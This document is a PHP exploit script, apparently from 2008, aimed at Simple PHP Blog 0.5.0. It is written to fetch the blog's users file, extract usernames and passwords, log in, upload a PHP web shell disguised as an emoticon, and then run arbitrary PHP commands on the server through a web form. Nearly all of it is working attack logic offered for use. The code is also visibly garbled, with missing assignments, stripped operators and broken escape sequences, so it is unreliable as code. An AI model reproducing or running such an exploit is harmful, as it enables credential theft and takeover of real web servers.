sIMPLE php bLOG 0.5.0 eXPLOIT
bY mAXzA 2008
function curl($url,$postvar){
global $cook;
$ch = curl_init( $url );
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_HEADER, 1);
curl_setopt ($ch, CURLOPT_REFERER,"$url");
if (strlen($postvar)<3) $postvar="123";
curl_setopt ($ch, CURLOPT_POSTFIELDS, $postvar);
if (strlen($cook)>3)
curl_setopt ($ch, CURLOPT_COOKIE, "$cook");
$res = curl_exec ($ch);$err=curl_error ( $ch );if ($err) print "<hr>$err<hr>";
return $res;
} function error($msg){
print "<hr>$msg<hr>n<h1>Not Exploitable";exit;
} extract($_POST);extract($_GET); print "<pre>URL:<form method=post><input size=80 name=url value=`$url`>";
if (strlen($eval)>3){
print "nEnter PHP Command:n<textarea name=eval rows=10 cols=90>$eval</textarea>";
print "<input type=submit value='Eval'></form>";
print substr($res,41);exit;
} if (strlen($url)>10)
print "n<hr>Trying to Get /config/users.php...";flush();
if (strstr($res,'|')) print "Done!nn$res";
else error("nnUsername & Password Not Foundnn$res"); print "n<hr>Trying to Get Username & Password...";flush();
$res=substr($res,strpos($res,"nn") 2);
if ($n) {
print "nDone! Found - $n users:n";
for ($x=0;$x<$n;$x ){
print "nUsername - ".$up[1]."tPassword - ".$up[2];
} print "n<hr>Trying to Login...";flush();
$cook=strstr($res,'Set-Cookie: sid=');
if ($cook) print "nnDone... Cookie - $cook";else error("n<h1>Error To Login</h1>nnn$res"); print "n<hr>Trying to Upload Emoticon...";flush();
if (@filesize('sphp.php')!=82){
if (strstr($res,"Success!")) print "nnDone! Exploit path - $url/images/emoticons/sphp.php"; else error("n<h1>Error To Upload</h1>nnn$res"); print "n<hr>Trying to Exploit...";flush();
$res=curl($url."/images/emoticons/sphp.php","z=print 20080824;");
if (strstr($res,"20080824")) print "nnDone! Exploit Working!"; else error("n<h1>Error To Exploit</h1>nnn$res"); print "n<hr>Trying to Logout...";flush();
if (strstr($res,"You are now logged out")) print "nnDone!"; else error("n<h1>Error To Logout</h1>nnn$res");
print "nEnter PHP Command:n<textarea name=eval rows=10 cols=90></textarea>";
print "<input type=submit ></form>";